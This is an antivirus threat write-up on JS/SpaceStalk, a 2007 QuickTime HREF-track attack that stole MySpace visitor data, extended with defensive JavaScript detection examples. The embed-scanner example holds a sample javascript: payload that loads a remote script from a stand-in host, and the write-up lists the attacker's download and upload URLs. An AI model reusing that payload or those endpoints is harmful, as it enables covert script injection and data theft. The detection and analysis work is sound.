JS/SpaceStalk

This page shows details and results of our analysis of the malware JS/SpaceStalk.

Overview

The JavaScript detected as JS/SpaceStalk is executed through QuickTime's HREF Tracks feature, a text track that carries URLs which QuickTime loads while a movie plays. When an infected site is viewed, a hidden embedded QuickTime movie plays automatically and uses its HREF track to download and execute a JavaScript file from an external site.

Information on the vulnerability which is being exploited can be found here:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0059

The script collects data about the user viewing the page and uploads it to a site controlled by the author.
Because the site serving the script is normally controlled by the malware author, the downloaded script can be changed at any time; the behaviour described here is what the analysed sample did, and later versions could perform further malicious actions.

Note:
This threat is proactively detected with the 4958 DATs onwards.

Minimum DAT

4958 (2007-02-07)

Updated DAT

4958 (2007-02-07)

Minimum Engine

5400.1158

File Length

varies

Description Added

2007-02-07

Description Modified

2007-03-16

Characteristics

-- Update March 16, 2007 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.theregister.co.uk/2007/03/16/myspace_quicktime_exploit/
--

The JavaScript detected as JS/SpaceStalk is executed through QuickTime's HREF Tracks feature, which lets a text track inside a movie carry URLs that QuickTime loads while the movie plays.

Information on the vulnerability which is being exploited by this script can be found here:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0059

When an infected site is viewed, a hidden embedded QuickTime movie plays automatically and uses its HREF track to download and execute a JavaScript file from an external site. The script collects data about the user viewing the page and uploads it to the author.
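The two artefacts a responder would look for on a page like this, as an added example that is not code from the AVERT write-up or from the threat itself: a scan of page HTML for a hidden QuickTime embed, and a byte-level search of a movie file for an HREF track directive that points at a javascript: URL. The host name `example-profile-host.invalid` is invented (the write-up redacts the real one), the page fragment and track text are constructed, and the assumption that the directive sits unobfuscated as ASCII inside the .mov is mine; a real file wraps the text in QuickTime atoms, which this scan does not parse.

```javascript
// Added example, not code from the AVERT write-up or from the threat.
// Part 1: find hidden QuickTime <embed>/<object> tags in page HTML.
// Part 2: find an HREF track directive in movie bytes that loads a javascript: URL.

// Parse the attributes of one <embed ...> or <object ...> tag into an object.
function parseAttrs(attrText) {
  const attrs = {};
  const attrRe = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let a;
  while ((a = attrRe.exec(attrText)) !== null) {
    attrs[a[1].toLowerCase()] = (a[2] ?? a[3] ?? a[4] ?? '').trim();
  }
  return attrs;
}

// Flag QuickTime embeds that are hidden (1x1 / 0x0 or CSS-hidden).
// A flat regex scan is enough for the simple profile markup of the period;
// it is not an HTML parser and will not follow nested <param> tags.
function findHiddenQuickTimeEmbeds(html) {
  const hits = [];
  const tagRe = /<(embed|object)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttrs(m[2]);
    const src = attrs.src || attrs.data || '';
    const isQuickTime = /\.mov(\?|#|$)/i.test(src) || /quicktime/i.test(attrs.type || '');
    if (!isQuickTime) continue;
    const dim = (v) => parseInt(v, 10) || 0;
    const tiny = ['width', 'height'].some((k) => k in attrs && dim(attrs[k]) <= 1);
    const cssHidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs.style || '');
    if (tiny || cssHidden) {
      hits.push({
        tag: m[1].toLowerCase(),
        src,
        autoplay: (attrs.autoplay || '').toLowerCase() === 'true',
      });
    }
  }
  return hits;
}

// QuickTime HREF track text uses A<url> for a link loaded automatically and
// T<frame> for the target frame; A<javascript:...> is what turns the track
// into script execution. Assumption: the text is stored unobfuscated as
// ASCII, so searching the raw bytes works without walking the atom tree.
function findScriptHrefTracks(movBytes) {
  const text = typeof movBytes === 'string' ? movBytes : Buffer.from(movBytes).toString('latin1');
  const re = /A<\s*(javascript:[^>]*)>/gi;
  const found = [];
  let m;
  while ((m = re.exec(text)) !== null) found.push(m[1]);
  return found;
}

// Constructed sample page: one 1x1 autoplaying movie next to a normal one.
const SAMPLE_HTML = `
<div class="profile">
  <embed src="http://example-profile-host.invalid/tys4.mov" type="video/quicktime"
         width="1" height="1" autoplay="true" controller="false">
  <embed src="http://example-profile-host.invalid/band_video.mov"
         width="320" height="240" autoplay="false" controller="true">
</div>`;

// Constructed stand-in for the text sample of a malicious HREF track.
const SAMPLE_TRACK = Buffer.concat([
  Buffer.from([0x00, 0x00, 0x00, 0x00]), // arbitrary leading bytes, as in a real file
  Buffer.from(
    "A<javascript:document.body.appendChild(document.createElement('script')).src='http://example-profile-host.invalid/logs4/sqltrack.js'> T<_self>",
    'latin1'
  ),
]);

console.log(findHiddenQuickTimeEmbeds(SAMPLE_HTML));
console.log(findScriptHrefTracks(SAMPLE_TRACK));
```

The HTML scan reports the 1x1 movie and ignores the visible one; the byte scan reports the javascript: directive and stays quiet on an ordinary `A<http://...>` link, which is the legitimate use of HREF tracks.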

The sample was recently noticed in the wild being hosted on the MySpace page of a French rock band. Upon visiting the site, a hidden embedded QuickTime movie is played from the following URL:

  • http://profileaware[Removed].com/tys4.mov

As the movie plays, its HREF track automatically loads and executes a JavaScript file from the URL:

  • http://profileaware[Removed].com/logs4/sqltrack.js

The executed script collects data about the visiting MySpace user and uploads it to the following sites:

  • http://stalkertrack.com/[Removed]/connect.php
  • http://profileaware[Removed].com/logs4/connect.php

Information transmitted includes:

  • MySpace Username
  • Other logins used by the same user
  • FriendID
  • Current page url
  • Referrer of the current page, etc.

Note: As the website being communicated with is normally controlled by the malware author, the script being downloaded and executed can be modified remotely at any time, and later versions could perform further malicious actions.

Symptoms

Upon execution, the script attempts to contact one or both of the following domains:

  • http://stalkert[Removed].com
  • http://profileaware[Removed].com
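Detection logic for these contacts, run over constructed proxy log lines, as an added example that is not part of the AVERT write-up. It flags any request to a watch-listed host (stalkertrack.com is the one the write-up spells out; the second host is redacted on the page and has to come from your own telemetry) and, independently of host names, the sequence the description lays out: a .mov fetch, a script fetch from the same server, then a request to connect.php from the same client within a short window. The log format, client addresses, the `example-profile-host.invalid` host and the 60-second window are all my assumptions.

```javascript
// Added example, not code from the AVERT write-up. Flags, in a proxy log,
// (a) requests to watch-listed hosts and (b) the .mov -> .js -> connect.php
// sequence the description lays out, per client, inside a time window.

// Host the write-up names in full. The second upload host is redacted on the
// page ("profileaware[Removed].com"), so it is left for the operator to add.
const DEFAULT_WATCH_HOSTS = ['stalkertrack.com'];

// Constructed log format (an assumption, not any real proxy's):
//   <ISO time> <client ip> <method> <absolute url> <status>
function parseLine(line) {
  const m = /^(\S+)\s+(\S+)\s+(GET|POST)\s+(\S+)\s+(\d{3})$/.exec(line.trim());
  if (!m) return null;
  let url;
  try { url = new URL(m[4]); } catch { return null; }
  return {
    ts: Date.parse(m[1]),
    client: m[2],
    method: m[3],
    url: m[4],
    host: url.hostname.toLowerCase(),
    path: url.pathname,
  };
}

function hostOnWatchList(host, watchHosts) {
  return watchHosts.some((w) => host === w || host.endsWith('.' + w));
}

// Returns one alert object per suspicious event, in log order.
function scanLog(lines, { watchHosts = DEFAULT_WATCH_HOSTS, windowMs = 60 * 1000 } = {}) {
  const alerts = [];
  const history = new Map(); // client ip -> parsed entries seen so far
  for (const line of lines) {
    const e = parseLine(line);
    if (!e) continue; // unparsable line: skip it rather than crash
    if (hostOnWatchList(e.host, watchHosts)) {
      alerts.push({ type: 'ioc-host', client: e.client, url: e.url });
    }
    const seen = history.get(e.client) || [];
    seen.push(e);
    history.set(e.client, seen);
    // The upload endpoint is the last step; look back for the movie and the
    // script it pulled in, from the same server, within the window.
    if (/\/connect\.php$/i.test(e.path)) {
      const recent = seen.filter((x) => e.ts - x.ts <= windowMs);
      const mov = recent.find((x) => /\.mov$/i.test(x.path));
      const js = mov && recent.find((x) => x.host === mov.host && x.ts >= mov.ts && /\.js$/i.test(x.path));
      if (mov && js) {
        alerts.push({ type: 'href-track-chain', client: e.client, chain: [mov.url, js.url, e.url] });
      }
    }
  }
  return alerts;
}

// Constructed sample: one client that hits the full chain plus the second
// upload host; a second client that fetches an unrelated movie and, much
// later, an unrelated connect.php (must not fire); one garbage line.
const SAMPLE_LOG = [
  '2007-03-16T10:00:01Z 10.1.2.3 GET http://www.example-social.invalid/band 200',
  '2007-03-16T10:00:02Z 10.1.2.3 GET http://example-profile-host.invalid/tys4.mov 200',
  '2007-03-16T10:00:03Z 10.1.2.3 GET http://example-profile-host.invalid/logs4/sqltrack.js 200',
  '2007-03-16T10:00:04Z 10.1.2.3 GET http://example-profile-host.invalid/logs4/connect.php?u=someuser&fid=12345 200',
  '2007-03-16T10:00:04Z 10.1.2.3 GET http://stalkertrack.com/x/connect.php?u=someuser 200',
  '2007-03-16T10:05:00Z 10.1.2.9 GET http://www.example.com/clip.mov 200',
  '2007-03-16T10:30:00Z 10.1.2.9 GET http://www.example.com/logs/connect.php 200',
  'this line is garbage and must be skipped',
];

for (const a of scanLog(SAMPLE_LOG)) console.log(JSON.stringify(a));
```

The chain rule fires twice for the first client (once per upload endpoint) and the host rule once, while the second client's movie and a connect.php half an hour later, with no script fetch in between, produce nothing. The chain rule is deliberately host-agnostic, so it still works after the author moves to a new domain, which the write-up notes is within their control.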

Method of Infection

This script runs automatically when a page hosting the malicious QuickTime movie is viewed in a browser with the QuickTime plug-in; no user action beyond visiting the page is required.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. Because the script is delivered through the QuickTime vulnerability referenced above (CVE-2007-0059), users should also apply Apple's QuickTime update that addresses it. AVERT recommends that users not trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.


Variants